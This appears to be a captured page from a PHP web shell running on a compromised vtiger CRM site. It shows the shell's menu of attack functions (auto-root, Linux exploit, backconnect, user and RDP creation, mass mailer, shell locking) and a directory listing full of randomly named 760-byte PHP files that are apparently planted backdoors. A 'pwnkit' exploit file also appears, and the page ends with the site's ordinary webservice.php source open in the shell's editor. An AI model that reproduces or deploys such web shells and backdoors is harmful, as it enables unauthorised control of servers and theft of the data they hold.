Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.217.175
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwx---r-x
cache
[ DIR ]
drwx---r-x
consumerportal
[ DIR ]
drwx---r-x
cron
[ DIR ]
drwx---r-x
data
[ DIR ]
drwx---r-x
include
[ DIR ]
drwx---r-x
includes
[ DIR ]
drwx---r-x
kcfinder
[ DIR ]
drwx---r-x
languages
[ DIR ]
drwx---r-x
layouts
[ DIR ]
drwx---r-x
libraries
[ DIR ]
drwx---r-x
license
[ DIR ]
drwx---r-x
logs
[ DIR ]
drwx---r-x
migrate
[ DIR ]
drwx---r-x
modules
[ DIR ]
drwx---r-x
packages
[ DIR ]
drwx---r-x
resources
[ DIR ]
drwx---r-x
schema
[ DIR ]
drwx---r-x
soap
[ DIR ]
drwx---r-x
storage
[ DIR ]
drwx---r-x
test
[ DIR ]
drwx---r-x
user_privileges
[ DIR ]
drwx---r-x
vtlib
[ DIR ]
drwx---r-x
.htaccess
109
B
-rw-r--r--
.mad-root
0
B
-rw----r--
Copyright.txt
93.76
KB
-rw----r--
LICENSE.txt
23.12
KB
-rw----r--
PEAR.php
33.13
KB
-rw----r--
README.md
3.08
KB
-rw----r--
Release_Notes.html
2.32
KB
-rw----r--
SPL-1.1.2.txt
23.2
KB
-rw----r--
SendSupportNotification.php
4.73
KB
-rw----r--
about.php
0
B
-rw----r--
amadcfck.php
760
B
-rw----r--
amhywpuk.php
760
B
-rw----r--
config.csrf-secret.php
60
B
-rw----r--
config.db.php
1.17
KB
-rw----r--
config.inc.php
6.15
KB
-rw----r--
config.performance.php
1.68
KB
-rw----r--
config.php
1.46
KB
-rw----r--
config.security.php
1.33
KB
-rw----r--
config.template.php
6.12
KB
-rw----r--
config_override.php
601
B
-rw----r--
connection.php
849
B
-rw----r--
copyright.html
1.19
KB
-rw----r--
crqylmnt.php
760
B
-rw----r--
elazbwnk.php
760
B
-rw----r--
favicon.ico
1.63
KB
-rw----r--
feqmwfhc.php
760
B
-rw----r--
forgotPassword.php
2.44
KB
-rw----r--
fugveiqp.php
760
B
-rw----r--
gmjbtxmy.php
760
B
-rw----r--
gmyosgol.php
760
B
-rw----r--
gnnxfswk.php
760
B
-rw----r--
google12bf33bc0b095a34.html
53
B
-rw----r--
htaccess.txt
17
B
-rw----r--
index.php
70.84
KB
-rw-r--r--
izbcvwpg.php
760
B
-rw----r--
jaklzfte.php
760
B
-rw----r--
jytvfhlh.php
760
B
-rw----r--
log4php.properties
2.27
KB
-rw----r--
nfunjxer.php
760
B
-rw----r--
nkfngbxn.php
760
B
-rw----r--
odylxpbr.php
760
B
-rw----r--
oeaasuek.php
760
B
-rw----r--
olkycafm.php
760
B
-rw----r--
ovmpacym.php
760
B
-rw----r--
parent_tabdata.php
466
B
-rw----r--
phpversionfail.php
2.63
KB
-rw----r--
pwnkit
0
B
-rwx---r-x
rnqbcnev.php
272
B
-rw----r--
robots.txt
243
B
-rw----r--
rqvfyjyf.php
760
B
-rw----r--
rzhyqmcf.php
760
B
-rw----r--
sadtbusf.php
760
B
-rw----r--
shorturl.php
883
B
-rw----r--
surnaryg.php
760
B
-rw----r--
svnjmvkg.php
760
B
-rw----r--
tabdata.php
2.32
KB
-rw----r--
ugbidzzi.php
760
B
-rw----r--
vtigercron.php
3.54
KB
-rw----r--
vtigerservice.php
1.74
KB
-rw----r--
vtigerversion.php
741
B
-rw----r--
vtkfgfmv.php
760
B
-rw----r--
webservice.php
4.5
KB
-rw----r--
wkueddbh.php
760
B
-rw----r--
xgjcsyoq.php
760
B
-rw----r--
xjhwlihv.php
760
B
-rw----r--
xkfabdun.php
760
B
-rw----r--
xphdvzfz.php
760
B
-rw----r--
zwzvzhuf.php
760
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : webservice.php
<?php /*+******************************************************************************* * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ********************************************************************************/ require_once("config.php"); /** * URL Verfication - Required to overcome Apache mis-configuration and leading to shared setup mode. */ if (file_exists('config_override.php')) { include_once 'config_override.php'; } //Overrides GetRelatedList : used to get related query //TODO : Eliminate below hacking solution include_once 'include/Webservices/Relation.php'; include_once 'vtlib/Vtiger/Module.php'; include_once 'includes/main/WebUI.php'; require_once("libraries/HTTP_Session2/HTTP/Session2.php"); require_once 'include/Webservices/Utils.php'; require_once("include/Webservices/State.php"); require_once("include/Webservices/OperationManager.php"); require_once("include/Webservices/SessionManager.php"); require_once("include/Zend/Json.php"); require_once('include/logging.php'); $API_VERSION = "0.22"; global $seclog,$log; $seclog =& LoggerManager::getLogger('SECURITY'); $log =& LoggerManager::getLogger('webservice'); function getRequestParamsArrayForOperation($operation){ global $operationInput; return $operationInput[$operation]; } function setResponseHeaders() { header('Content-type: application/json'); } function writeErrorOutput($operationManager, $error){ setResponseHeaders(); $state = new State(); $state->success = false; $state->error = $error; unset($state->result); $output = $operationManager->encode($state); echo $output; } function writeOutput($operationManager, $data){ setResponseHeaders(); $state = new State(); $state->success = true; $state->result = $data; unset($state->error); $output = $operationManager->encode($state); echo $output; } $operation = vtws_getParameter($_REQUEST, "operation"); $operation = strtolower($operation); $format = vtws_getParameter($_REQUEST, "format","json"); $sessionId = vtws_getParameter($_REQUEST,"sessionName"); $sessionManager = new SessionManager(); $operationManager = new OperationManager($adb,$operation,$format,$sessionManager); try{ if(!$sessionId || strcasecmp($sessionId,"null")===0){ $sessionId = null; } $input = $operationManager->getOperationInput(); $adoptSession = false; if(strcasecmp($operation,"extendsession")===0){ if(isset($input['operation'])){ // Workaround fix for PHP 5.3.x: $_REQUEST doesn't have PHPSESSID if(isset($_REQUEST['PHPSESSID'])) { $sessionId = vtws_getParameter($_REQUEST,"PHPSESSID"); } else { // NOTE: Need to evaluate for possible security issues $sessionId = vtws_getParameter($_COOKIE,'PHPSESSID'); } // END $adoptSession = true; }else{ writeErrorOutput($operationManager,new WebServiceException(WebServiceErrorCode::$AUTHREQUIRED,"Authencation required")); return; } } $sid = $sessionManager->startSession($sessionId,$adoptSession); if(!$sessionId && !$operationManager->isPreLoginOperation()){ writeErrorOutput($operationManager,new WebServiceException(WebServiceErrorCode::$AUTHREQUIRED,"Authencation required")); return; } if(!$sid){ writeErrorOutput($operationManager, $sessionManager->getError()); return; } $userid = $sessionManager->get("authenticatedUserId"); if($userid){ $seed_user = new Users(); $current_user = $seed_user->retrieveCurrentUserInfoFromFile($userid); }else{ $current_user = null; } $operationInput = $operationManager->sanitizeOperation($input); $includes = $operationManager->getOperationIncludes(); foreach($includes as $ind=>$path){ checkFileAccessForInclusion($path); require_once($path); } $rawOutput = $operationManager->runOperation($operationInput,$current_user); writeOutput($operationManager, $rawOutput); } catch (DuplicateException $e) { writeErrorOutput($operationManager,new WebServiceException($e->getCode(), $e->getMessage())); }catch(WebServiceException $e){ writeErrorOutput($operationManager,$e); }catch(Exception $e){ writeErrorOutput($operationManager, new WebServiceException(WebServiceErrorCode::$INTERNALERROR,"Unknown Error while processing request")); } ?>
Close